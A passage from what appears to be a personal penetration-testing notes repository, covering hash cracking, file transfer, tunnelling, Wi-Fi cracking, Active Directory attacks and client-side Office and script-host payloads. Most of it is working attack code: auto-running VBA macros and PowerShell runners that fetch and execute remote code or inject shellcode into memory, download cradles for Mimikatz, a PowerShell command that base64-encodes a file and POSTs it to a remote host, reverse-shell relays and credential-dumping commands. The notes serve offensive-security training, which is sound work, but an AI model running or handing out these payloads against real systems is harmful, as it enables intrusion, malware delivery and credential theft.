SYS_PTRACE Capability 156 | #### Insecure Options 157 | `--pid=host --cap-add SYS_PTRACE` 158 | #### Why? 159 | Debugger containers. 160 | #### Enumeration 161 | Watch out for same PID namespace as host. 162 | #### Exploitation 163 | https://0x00sec.org/t/linux-infecting-running-processes/1097 164 | 165 | Update shellcode and compile the code. 166 | 167 | ```bash 168 | ./inject PID 169 | ``` 170 | --- 171 | -------------------------------------------------------------------------------- /Misc/Cracking Hashes.md: -------------------------------------------------------------------------------- 1 | ## Identifying hashes 2 | 3 | ``` 4 | https://hashcat.net/wiki/doku.php?id=example_hashes 5 | https://hashid.zulln.se/ 6 | hashid 7 | ``` 8 | 9 | ## john rules 10 | 11 | ``` 12 | john -wordlist= --rules:All 13 | ``` 14 | 15 | ## Cracking non-salted hashes online 16 | 17 | ``` 18 | https://crackstation.net/ 19 | https://www.hashes.org/search.php 20 | https://hashes.com/en/decrypt/hash 21 | ``` 22 | 23 | ## Cracking password of id\_rsa 24 | 25 | ``` 26 | /usr/share/john/ssh2john.py id_rsa > id_rsa.hashes 27 | john -w /usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hashes 28 | ``` 29 | 30 | ## Cracking passwd/shadow 31 | 32 | ```text 33 | # unshadow 34 | /usr/sbin/unshadow passwd shadow >> crack.me 35 | 36 | # crack with john 37 | john -wordlist=/usr/share/wordlists/rockyou.txt crack.me 38 | 39 | # or with hashcat 40 | hashcat -m 500 -a 0 crack.me /usr/share/wordlists/rockyou.txt -O 41 | ``` 42 | 43 | ## Cracking windows hashes 44 | 45 | ``` 46 | use post/windows/gather/credentials/credential_collector 47 | ``` 48 | 49 | ## Cracking .zip/.rar files 50 | 51 | ``` 52 | zip2john test.zip > zip.hashes 53 | rar2john test.rar > rar.hashes 54 | 55 | john zip.hashes 56 | john rar.hashes 57 | ``` 58 | 59 | ``` 60 | fcrackzip -v -u -D -p wordlist.txt file.zip 61 | ``` 62 | 63 | -------------------------------------------------------------------------------- /Misc/Custom Wordlists.md: -------------------------------------------------------------------------------- 1 | # Custom wordlist generation 2 | 3 | ## Generating usernames from names 4 | 5 | ```python 6 | import sys 7 | 8 | if len(sys.argv) != 2: 9 | print("Usage: {} NAMEFILE".format(sys.argv[0])) 10 | sys.exit(0) 11 | 12 | for line in open(sys.argv[1]): 13 | full_name = line.replace("\n", "") 14 | tokens = full_name.split(" ") 15 | fst = tokens[0] 16 | lst = tokens[-1] 17 | 18 | print(fst) 19 | print(lst) 20 | print(fst[0] + lst) 21 | print(fst[0] + "." + lst) 22 | print(fst + lst) 23 | print(fst + "." + lst) 24 | print(lst + fst[0]) 25 | print(lst + "." + fst[0]) 26 | print(lst + fst) 27 | print(lst + "." + fst) 28 | 29 | ``` 30 | 31 | ## Generating passwords from text 32 | 33 | Cewl will generate wordlist from contents of a webpage. 34 | 35 | ``` 36 | cewl >> wordlist.txt 37 | ``` 38 | 39 | or this custom python script 40 | 41 | ```python 42 | import re 43 | 44 | with open("index.html", "r") as f: 45 | wordlist = set() 46 | for line in f.readlines(): 47 | line = re.sub('[^0-9a-zA-Z]+', ' ', line) 48 | for l in line.split(" "): 49 | wordlist.add("admin:"+l) 50 | for word in wordlist: 51 | print(word) 52 | ``` 53 | -------------------------------------------------------------------------------- /Misc/File Transfers.md: -------------------------------------------------------------------------------- 1 | # file transfers 2 | 3 | ## Windows 4 | 5 | ### powershell download 6 | 7 | ``` 8 | (New-Object System.Net.WebClient).DownloadFile('https:///PowerView.ps1',".\PowerView.ps1") 9 | Invoke-WebRequest https:///PowerView.ps1 -OutFile PowerView.ps1 10 | ``` 11 | 12 | ### powershell in memory execution 13 | 14 | ``` 15 | IEX (New-Object Net.WebClient).DownloadString('https:///Invoke-Mimikatz.ps1') 16 | Invoke-WebRequest https:///Invoke-Mimikatz.ps1 | iex 17 | ``` 18 | 19 | ### if powershell first launch configuration has not been completed 20 | 21 | use `-UseBasicParsing` 22 | 23 | ``` 24 | Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | iex 25 | ``` 26 | 27 | or disable first run customization 28 | 29 | ``` 30 | reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2 31 | ``` 32 | 33 | ### powershell uploads 34 | 35 | catch with netcat 36 | 37 | ``` 38 | $b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/' -Encoding Byte)) 39 | Invoke-WebRequest -Uri http://: -Method POST -Body $b64 40 | ``` 41 | 42 | ### bitsadmin 43 | 44 | ``` 45 | bitsadmin /transfer n http:///nc.exe C:\Temp\nc.exe 46 | ``` 47 | 48 | powershell download or upload using bitsadmin 49 | 50 | ``` 51 | Import-Module bitstransfer;Start-BitsTransfer -Source "http:///nc.exe" -Destination "C:\Temp\nc.exe" 52 | Start-BitsTransfer "C:\" -Destination "http:///uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql 53 | ``` 54 | 55 | ### certutil 56 | 57 | ``` 58 | certutil.exe -verifyctl -split -f http:///nc.exe 59 | ``` 60 | 61 | ## Netcat 62 | 63 | ``` 64 | # source 65 | nc -nv < 66 | 67 | # destination 68 | nc -lvnp > 69 | ``` 70 | 71 | ## Powercat 72 | 73 | ``` 74 | # source 75 | powercat -c -p -i C:\ 76 | 77 | # destination 78 | powercat -l -p -of C:\ 79 | ``` 80 | 81 | ## Socat 82 | 83 | ``` 84 | # source 85 | socat TCP4-LISTEN:,fork file: 86 | 87 | # destination 88 | socat TCP4:: file:,create 89 | ``` 90 | 91 | ## HTTP server + Powershell 92 | 93 | ``` 94 | # create server on attacker machine with one of these 95 | python3 -m http.server 96 | python2 -m SimpleHTTPServer 97 | php -S 0.0.0.0: 98 | ruby -run -e httpd . -p 99 | busybox -f -p 100 | 101 | # download with powershell oneliner 102 | ## download file 103 | (New-Object System.Net.WebClient).DownloadString("","") 104 | 105 | ## execute powershell script without touching disk 106 | iex (New-Object System.Net.WebClient).DownloadString("") 107 | 108 | ## upload file 109 | iex (New-Object System.Net.WebClient).UploadFile("", "") 110 | ``` 111 | 112 | ## pure-ftp 113 | 114 | ``` 115 | # ftp server needs to be configured before 116 | 117 | echo open 21 > ftp.txt 118 | echo user >> ftp.txt 119 | echo >> ftp.txt 120 | echo bin >> ftp.txt 121 | echo get >> ftp.txt 122 | echo bye >> ftp.txt 123 | 124 | ftp -v -n -s:ftp.txt 125 | ``` 126 | 127 | ## exe2hex 128 | 129 | ``` 130 | upc -9 131 | exe2hex -x -p .cmd 132 | # copy paste into target terminal 133 | ``` 134 | 135 | ## If everything fails, base64 136 | 137 | -------------------------------------------------------------------------------- /Misc/Firewall Evasion.md: -------------------------------------------------------------------------------- 1 | # Firewall/IDS evasion 2 | 3 | ## Fragmentation 4 | 5 | Fragmenting of packets can be turned on using `-f` option in nmap. 6 | 7 | Fragmentations doesn't work with every type of scan, for example `-sT` or `-sV`. 8 | 9 | Instead of using `-f`, we can use `--mtu` for custom offset size (must be a multiple of 8). 10 | 11 | ## Decoys 12 | 13 | Evasion using decoys works by sending packets from spoofed IP's (it's best if spoofed IP's are from real machines). 14 | 15 | Decoys can be turned on using `-D` option. 16 | 17 | ```bash 18 | nmap -sS -D DECOY1,DECOY2,DECOY3,ME RHOST 19 | ``` 20 | 21 | Without specifying `ME`, nmap will send scans with your IP in a random position. 22 | 23 | You cannot use `-sT` and `-sV` scans with decoy mode enabled. 24 | 25 | ## Timing 26 | 27 | Only slows down scanning, doesn't alter packets in any way. 28 | 29 | Use `-T` option to specify timing 30 | 31 | |Option|Delay| 32 | |---|---| 33 | |-T0|5 min| 34 | |-T1|15 sec| 35 | |-T2|0,4 sec| 36 | |-T3|default| 37 | |-T4|10 millisec| 38 | |-T5|5 millisec| 39 | 40 | ## Source ports 41 | 42 | Changing source port to 53, 80 or 443 can also help 43 | 44 | Use `--source-port` or `-g` option 45 | 46 | ```bash 47 | nmap -sS --source-port 53 RHOST 48 | ``` 49 | -------------------------------------------------------------------------------- /Misc/Recon.md: -------------------------------------------------------------------------------- 1 | amass enum -ip -src -d DOMAIN -dir OUT 2 | amass viz -d3 -dir INPUT 3 | 4 | theharvester -d DOMAIN -b all 5 | theharvester -d DOMAIN -b all -n 6 | 7 | rustscan -a IP -- -sVC -oN nmap-tcp 8 | sudo nmap -sU IP -oN nmap-udp 9 | 10 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt 11 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-large-directories.txt 12 | 13 | ffuf -w ~/wordlists/raft.txt -u http://IP/FUZZ/ 14 | ffuf -w ~/wordlists/subdomains.txt -u http://IP/ -H 'Host: FUZZ.DOMAIN' -------------------------------------------------------------------------------- /Misc/SSH Forward Connections.md: -------------------------------------------------------------------------------- 1 | # SSH forward connection 2 | 3 | ## Port forwarding 4 | 5 | ``` 6 | ssh -L LPORT:RHOST:RHOST USER@RHOST -fN 7 | ``` 8 | 9 | ## Proxies 10 | 11 | ``` 12 | ssh -D LPORT USER@RHOST -fN 13 | cp /etc/proxychains.conf . 14 | vim proxychains.conf 15 | proxychains COMMAND 16 | ``` 17 | -------------------------------------------------------------------------------- /Misc/SSH Remote Connections.md: -------------------------------------------------------------------------------- 1 | # SSH remote connections 2 | 3 | ``` 4 | ssh-keygen 5 | vim ~/.ssh/authorized_keys 6 | command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty PUBLICKEY 7 | sudo systemctl status ssh 8 | sudo systemctl start ssh 9 | ssh -R LPORT:RHOST:RPORT USER@LHOST -i KEYFILE -fN 10 | ``` 11 | 12 | > By editing the SSH config file (usually /etc/ssh/sshd_config on Linux), you can set the GatewayPorts to yes and then it should allow SSH tunnels to listen on the other interfaces. 13 | 14 | ``` 15 | ssh -R LPORT USER@LHOST -i KEYFILE -fN 16 | ``` 17 | -------------------------------------------------------------------------------- /Misc/Socat.md: -------------------------------------------------------------------------------- 1 | # Socat 2 | 3 | [https://github.com/3ndG4me/socat/releases/tag/v1.7.3.3](https://github.com/3ndG4me/socat/releases/tag/v1.7.3.3) 4 | 5 | [linux](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) 6 | [windows](https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip/download) 7 | 8 | ## Reverse shell relay 9 | 10 | This way we can relay reverse shells for multiple hops 11 | 12 | ``` 13 | ./socat tcp-l:LPORT tcp:RHOST:RPORT & 14 | ``` 15 | 16 | ## Port forwarding (fast n' ugly) 17 | 18 | ``` 19 | ./socat tcp-l:LPORT,fork,reuseaddr tcp:RHOST:RPORT & 20 | ``` 21 | 22 | ## Port forward (advanced) 23 | 24 | First of all, on our own attacking machine, we issue the following command: 25 | ``` 26 | socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & 27 | ``` 28 | 29 | This opens up two ports: 8000 and 8001, creating a local port relay. What goes into one of them will come out of the other. For this reason, port 8000 also has the fork and reuseaddr options set, to allow us to create more than one connection using this port forward. 30 | 31 | Next, on the compromised relay server (172.16.0.5 in the previous example) we execute this command: 32 | ``` 33 | ./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork & 34 | ``` 35 | 36 | This makes a connection between our listening port 8001 on the attacking machine, and the open port of the target server. To use the fictional network from before, we could enter this command as: 37 | ``` 38 | ./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork & 39 | ``` 40 | 41 | 42 | -------------------------------------------------------------------------------- /Misc/Wireless Security.md: -------------------------------------------------------------------------------- 1 | 2 | # WEF 3 | https://github.com/D3Ext/WEF 4 | 5 | # Wifite 6 | sudo wifite -mac --skip-crack --clients-only -wpa --no-wps --no-pmkid 7 | 8 | https://hashcat.net/cap2hashcat/ 9 | 10 | hashcat.exe -m 22000 HASHFILE -a 3 ?d?d?d?d?d?d?d?d?d 11 | 12 | # The old way 13 | ```bash 14 | airmon-ng check 15 | airmon-ng check kill 16 | airmon-ng start INTERFACE 17 | airodump-ng INTERFACE 18 | airodump-ng INTERFACE --bssid APMAC -c CHANNEL -w CAPFILE 19 | aireplay-ng INTERFACE --deauth 20 -a APMAC -h CLIENTMAC 20 | aircrack-ng -w WORDLIST CAPFILE 21 | airmon-ng stop INTERFACE 22 | systemctl start network-manager 23 | ``` 24 | -------------------------------------------------------------------------------- /P300/1. Client Side Code Execution With Office.md: -------------------------------------------------------------------------------- 1 | # VBA Macro 101 2 | ```vb 3 | Sub MyMacro() 4 | Dim name As String 5 | Dim age As Long 6 | Dim pointer As LongPtr 7 | 8 | age = 18 9 | If age >= 18 Then 10 | MsgBox ("if") 11 | Else 12 | MsgBox ("else") 13 | End If 14 | 15 | For i = 1 To 4 16 | MsgBox (i) 17 | Next i 18 | 19 | Dim cmd1 As String 20 | cmd1 = "cmd.exe" 21 | Shell cmd1, vbHide 22 | 23 | Dim cmd2 As String 24 | cmd2 = "cmd.exe" 25 | CreateObject("Wscript.Shell").Run cmd2, 0 26 | End Sub 27 | ``` 28 | 29 | # Autorun 30 | ```vb 31 | Sub AutoOpen() 32 | MyMacro 33 | End Sub 34 | 35 | Sub Document_Open() 36 | MyMacro 37 | End Sub 38 | 39 | Sub Workbook_Open() 40 | MyMacro 41 | End Sub 42 | ``` 43 | 44 | # Command Execution 45 | ```vb 46 | Dim cmd As String 47 | cmd = "calc.exe" 48 | Shell cmd, 0 49 | 50 | Dim cmd As String 51 | cmd = "calc.exe" 52 | CreateObject("Wscript.Shell").Run cmd, 0 53 | ``` 54 | 55 | # Download to disk and execute 56 | ```vb 57 | Sub MyMacro() 58 | Dim downloader As String 59 | downloader = "powershell.exe (New-Object Net.WebClient).DownloadFile('URL', 'OUTFILE')" 60 | CreateObject("Wscript.Shell").Run downloader, 0 61 | 62 | Wait (4) 63 | 64 | Dim executalbe As String 65 | executalbe = ActiveDocument.path + "\OUTFILE" 66 | Shell executalbe, 0 67 | End Sub 68 | 69 | Sub Wait(delay As Long) 70 | Dim start As Date 71 | start = Now 72 | Do 73 | DoEvents 74 | Loop Until Now >= DateAdd("s", delay, start) 75 | End Sub 76 | ``` 77 | 78 | # Pretext 79 | select decrypted text and navigate to Insert > Quick Parts > AutoTexts and Save Selection to AutoText Gallery, with the name Content 80 | 81 | ```vb 82 | Sub Decrypt() 83 | ActiveDocument.Content.Select 84 | Selection.Delete 85 | ActiveDocument.AttachedTemplate.AutoTextEntries("Content").Insert Where:=Selection.Range, RichText:=True 86 | End Sub 87 | ``` 88 | 89 | # Injecting shellcode into winword.exe 90 | Get function declarations from peinvoke.net 91 | ```vb 92 | Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Gkuenc As Long, ByVal Jzbgjtn As Long, ByVal Hihijhmu As LongPtr, Xnn As Long, ByVal Sdcrgxe As Long, Onxeicbxx As Long) As LongPtr 93 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kwslq As Long, ByVal Elatcsga As Long, ByVal Wvzghg As Long, ByVal Qbqhwrhcw As Long) As LongPtr 94 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Nai As LongPtr, ByRef Mdhui As Any, ByVal Bncuuvusw As Long) As LongPtr 95 | Private Declare PtrSafe Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flNewProtect As Long, ByRef lpflOldProtect As LongPtr) As Long 96 | Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr 97 | 98 | Sub Auto_Open() 99 | Dim tmp As Long, payload As Variant, i As Long 100 | Dim memory As LongPtr, result As LongPtr 101 | Dim r As Long 102 | 103 | payload = Array(....SNIP....) 104 | 105 | memory = VirtualAlloc(0, UBound(payload), &H1000, &H4) 106 | 107 | For i = LBound(payload) To UBound(payload) 108 | tmp = payload(i) 109 | result = RtlMoveMemory(memory + i, tmp, 1) 110 | Next i 111 | 112 | r = VirtualProtectEx(GetCurrentProcess(), memory, UBound(payload), &H20, 0) 113 | 114 | result = CreateThread(0, 0, memory, 0, 0, 0) 115 | End Sub 116 | 117 | Sub AutoOpen() 118 | Auto_Open 119 | End Sub 120 | 121 | Sub Workbook_Open() 122 | Auto_Open 123 | End Sub 124 | ``` 125 | --- 126 | # Injecting shellcode into powershell.exe (meh) 127 | ```powershell 128 | $Kernel32 = @" 129 | using System; 130 | using System.Runtime.InteropServices; 131 | public class Kernel32 { 132 | [DllImport("kernel32")] 133 | public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 134 | [DllImport("kernel32", CharSet=CharSet.Ansi)] 135 | public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 136 | [DllImport("kernel32.dll", SetLastError=true)] 137 | public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 138 | } 139 | "@ 140 | Add-Type $Kernel32 141 | 142 | [Byte[]] $buf = ....SNIP.... 143 | $size = $buf.Length 144 | [IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size,0x3000,0x40); 145 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size); 146 | $thandle=[Kernel32]::CreateThread(0,0,$addr,0,0,0); 147 | [Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF") 148 | ``` 149 | 150 | ```vb 151 | Sub Auto_Open() 152 | Dim str As String 153 | str = "powershell (New-ObjectSystem.Net.WebClient).DownloadString('URL') | IEX" 154 | Shell str, vbHide 155 | End Sub 156 | 157 | Sub AutoOpen() 158 | Auto_Open 159 | End Sub 160 | 161 | Sub Workbook_Open() 162 | Auto_Open 163 | End Sub 164 | ``` 165 | 166 | # .NET Framework Reflection (without touching the disk) 167 | ```powershell 168 | function LookupFunc { 169 | Param ($moduleName, $functionName) 170 | $assembly = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { 171 | $_.GlobalAssemblyCache -and $_.Location.Split("\\")[-1].Equals("System.dll") 172 | }).gettype("Microsoft.Win32.UnsafeNativeMethods") 173 | $methods = @() 174 | $assembly.getMethods() | foreach-object {if($_.name -eq "GetProcAddress") {$methods+=$_}} 175 | return $methods[0].Invoke($null, @(($assembly.getMethod("GetModuleHandle")).invoke($null, @($moduleName)), $functionName)) 176 | } 177 | 178 | function getDelegateType { 179 | param([Parameter(position = 0, Mandatory = $true)] [AllowEmptyCollection()] [Type[]] $func,[Parameter(position = 1)] [Type] $delType = [Void]) 180 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass", [System.MulticastDelegate]) 181 | $type.DefineConstructor("RTSpecialName, HideBySig, Public", [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed") 182 | $type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed") 183 | return $type.CreateType() 184 | } 185 | 186 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( 187 | (LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])) 188 | ).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x4) 189 | 190 | [Byte[]] $buf = ....SNIP.... 191 | 192 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length) 193 | 194 | $ret = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( 195 | (lookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])) 196 | ).Invoke($lpMem, [uint32]$buf.Length, 0x20, [ref]0) 197 | 198 | $hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( 199 | (LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])) 200 | ).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero) 201 | 202 | $ret = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( 203 | (LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int])) 204 | ).Invoke($hThread, 0xFFFFFFFF) 205 | ``` 206 | 207 | ```vb 208 | Sub Auto_Open() 209 | Dim str As String 210 | str = "powershell (New-ObjectSystem.Net.WebClient).DownloadString('URL') | iex" 211 | Shell str, vbHide 212 | End Sub 213 | 214 | Sub AutoOpen() 215 | Auto_Open 216 | End Sub 217 | 218 | Sub Workbook_Open() 219 | Auto_Open 220 | End Sub 221 | ``` 222 | 223 | # Powershell WebClient shenanigans 224 | ```powershell 225 | [System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://melnicek.github.io") 226 | ``` 227 | 228 | ```powershell 229 | $client = New-Object System.Net.WebClient 230 | $client.Headers.Add("User-Agent", "UAGENT") 231 | $client.DownloadString("URL") 232 | ``` 233 | 234 | ```powershell 235 | $client = new-object system.net.WebClient 236 | $client.proxy = $null 237 | $client.DownloadString("URL") 238 | ``` 239 | 240 | ```powershell 241 | New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null 242 | $keys = Get-ChildItem 'HKU:\' 243 | ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}} 244 | $proxyAddr = (Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer 245 | [system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr") 246 | $wc = new-object system.net.WebClient 247 | $wc.DownloadString("URL") 248 | ``` 249 | 250 | -------------------------------------------------------------------------------- /P300/2. Client Side Code Execution With Windows Script Host.md: -------------------------------------------------------------------------------- 1 | # JScript 101 2 | ```js 3 | var url = "URL"; 4 | var Object = WScript.CreateObject("MSXML2.XMLHTTP"); 5 | Object.Open("GET", url, false); 6 | Object.Send(); 7 | 8 | if(Object.Status == 200) { 9 |     var Stream = WScript.CreateObject("ADODB.Stream"); 10 |     Stream.Open(); 11 |     Stream.Type = 1; 12 |     Stream.Write(Object.ResponseBody); 13 |     Stream.Position = 0; 14 | 15 |     Stream.SaveToFile("OUTFILE", 2); 16 |     Stream.Close(); 17 | } 18 | var r = new ActiveXObject("WScript.Shell").Run("OUTFILE"); 19 | ``` 20 | 21 | # SharpShooter 22 | https://github.com/mdsecactivebreach/SharpShooter 23 | 24 | # In-Memory PowerShell 25 | ```powershell 26 | $data = (New-Object System.Net.WebClient).DownloadData('URL') 27 | $assem = [System.Reflection.Assembly]::Load($data) 28 | $class = $assem.GetType("ClassLibrary1.Class1") 29 | $method = $class.GetMethod("runner") 30 | $method.Invoke(0, $null) 31 | ``` -------------------------------------------------------------------------------- /Pasted image 20220801123813.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/melnicek/notes/8bfef9acc8615f7591d9c00977f586b7cbf43895/Pasted image 20220801123813.png -------------------------------------------------------------------------------- /Pentesting Active Directory/0. Active Directory 101.md: -------------------------------------------------------------------------------- 1 | 2 | [HTB - AD 101](https://www.hackthebox.com/home/tracks/4) 3 | [HTB - AD 101 Walkthrough](https://www.youtube.com/playlist?list=PLrmSJpHp5WGg4sUndkYBg8B5qO2COSxS4) 4 | 5 | [TryHackMe - Hacking Active Directory](https://tryhackme.com/module/hacking-active-directory) 6 | [TryHackMe - Hacking Active Directory Walkthrough](https://www.youtube.com/playlist?list=PLmDlGk9PnoAOPh7-epS-ZOoPyMyeJZ9Wp) 7 | 8 | [VBScrub](https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ/videos) 9 | -------------------------------------------------------------------------------- /Pentesting Active Directory/Active Directory Enumeration.md: -------------------------------------------------------------------------------- 1 | # Active Directory enumeration 2 | 3 | ## Downloading our tools 4 | 5 | We can download files onto disk using: 6 | `certutil.exe` inside cmd, 7 | `Invoke-WebRequest` (or it's wget/curl alias) inside powershell. 8 | 9 | ```powershell 10 | certutil.exe -urlcache -f http://RHOST:RPORT/file.ps1 file.ps1 11 | Invoke-WebRequest http://RHOST:RPORT/file.ps1 -OutFile file.ps1 12 | ``` 13 | 14 | We can also load files straight into memory using `iex`. 15 | 16 | ```powershell 17 | iex (New-Object Net.WebClient).DownloadString("http://RHOST:RPORT/file.ps1") 18 | ``` 19 | 20 | ## Enumerating users 21 | 22 | ```powershell 23 | Get-NetUser 24 | Get-NetUser | Select cn 25 | Get-NetUser | Select -ExpandProperty samaccountname 26 | Find-UserField -SearchField description "pass" 27 | Invoke-EnumerateLocalAdmin 28 | ``` 29 | 30 | ## Enumerating groups 31 | 32 | ```powershell 33 | Get-NetGroup 34 | Get-NetGroup -UserName "USERNAME" 35 | Get-NetGroup -GroupName "GROUPNAME" -FullData 36 | ``` 37 | 38 | ## Enumerating computers and shares 39 | 40 | ```powershell 41 | Get-NetComputer 42 | Get-NetComputer -FullData 43 | Get-NetComputer -OperatingSystem "*windows 10*" 44 | Get-NetComputer -OperatingSystem "*server 2019*" 45 | Invoke-ShareFinder 46 | Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC 47 | ``` 48 | 49 | ## Enumerating misc. 50 | 51 | ```powershell 52 | Get-NetDomain 53 | Get-NetGPO 54 | Get-ObjectACL 55 | ``` 56 | -------------------------------------------------------------------------------- /Pentesting Active Directory/Active Directory.md: -------------------------------------------------------------------------------- 1 | # Impacket instalation 2 | 3 | ## Introduction 4 | 5 | So you're likely here if you've had issues with Impacket. Impacket is moderately frustrating to say the least... A lot of people have issues with it, so let's walk through the Impacket install process! 6 | 7 | ## Installing Impacket 8 | 9 | First, you'll want to clone the repo with: 10 | 11 | ``` 12 | git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket 13 | ``` 14 | 15 | This will clone Impacket to /opt/impacket/, after the repo is cloned, you will notice several install related files, requirements.txt, and setup.py. Setup.py is commonly skipped during the installation. It's key that you DO NOT miss it. 16 | 17 | So let's install the requirements: 18 | 19 | ``` 20 | pip3 install -r /opt/impacket/requirements.txt 21 | ``` 22 | 23 | Once all the python modules are installed, we can then run the python setup install script: 24 | 25 | ``` 26 | cd /opt/impacket/ && python3 ./setup.py install 27 | ``` 28 | 29 | After that, Impacket should be correctly installed now and it should be ready to use! 30 | 31 | # Kerbrute 32 | 33 | ## Instalation 34 | Clone the repository. 35 | 36 | ``` 37 | git clone https://github.com/ropnop/kerbrute.git /opt/kerbrute 38 | cd /opt/kerbrute 39 | ``` 40 | 41 | With the repository cloned, you can also use the Make file to compile for common architectures: 42 | 43 | ``` 44 | make help 45 | make all 46 | ``` 47 | 48 | Your new binaries will be inside `dist` directory. 49 | 50 | ## Usage 51 | 52 | Enumerating users: 53 | 54 | ``` 55 | ./kerbrute_linux_386 userenum --dc -d 56 | ``` 57 | 58 | # ASREPRoasting 59 | 60 | After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. 61 | 62 | ## Exploitation 63 | 64 | Impacket has a tool called "GetNPUsers.py" (located in Impacket/Examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that's necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute. 65 | 66 | ``` 67 | python3 GetNPUsers.py / -dc-ip -usersfile 68 | ``` 69 | 70 | Then crack dumped hashes. 71 | 72 | ``` 73 | hashcat -m 18200 74 | ``` 75 | 76 | # secretsdump.py 77 | 78 | For this command to work you will need to also know user's password. 79 | 80 | ``` 81 | secretsdump.py -dc-ip @ 82 | ``` 83 | 84 | When successfull, this will dump domain user's NT:LM hashes. 85 | -------------------------------------------------------------------------------- /Pentesting Active Directory/Breaching Active Directory.md: -------------------------------------------------------------------------------- 1 | https://tryhackme.com/room/breachingad 2 | 3 | ## Getting AD credentials: 4 | - NTLM Authenticated Services 5 | - LDAP Bind Credentials 6 | - Authentication Relays 7 | - Microsoft Deployment Toolkit 8 | - Configuration Files 9 | 10 | ## OSINT and Phishing 11 | OSINT: https://tryhackme.com/room/redteamrecon 12 | Phishing: https://tryhackme.com/module/phishing 13 | 14 | ## NTLM Authenticated Services 15 | hydra -L usernames.txt -p Changeme123 http-get://ntlmauth.za.tryhackme.com 16 | 17 | ## LDAP Bind Credentials (LDAP Pass-back Attack) 18 | tricking service to autheticate to our ldap server(port 389) 19 | https://www.digitalreplica.org/articles/openldap-for-ldap-plain-text-password-capture/ 20 | 21 | ## Authentication Relays 22 | sudo responder -I INTERFACE 23 | 24 | ## Microsoft Deployment Toolkit 25 | PXE Boot Image Retrieval 26 | ```powershell 27 | tftp -i IP GET "\tmp\BCDFILE" conf.bcd 28 | Import-Module .\PowerPXE.ps1 29 | $BCDFile = "conf.bcd" 30 | Get-WimFile -bcdFile $BCDFile 31 | tftp -i IP GET "IMAGE_LOCATION" pxeboot.wim 32 | Get-FindCredentials -WimFile pxeboot.wim 33 | ``` 34 | 35 | ## Configuration Files 36 | https://github.com/GhostPack/Seatbelt -------------------------------------------------------------------------------- /Pentesting 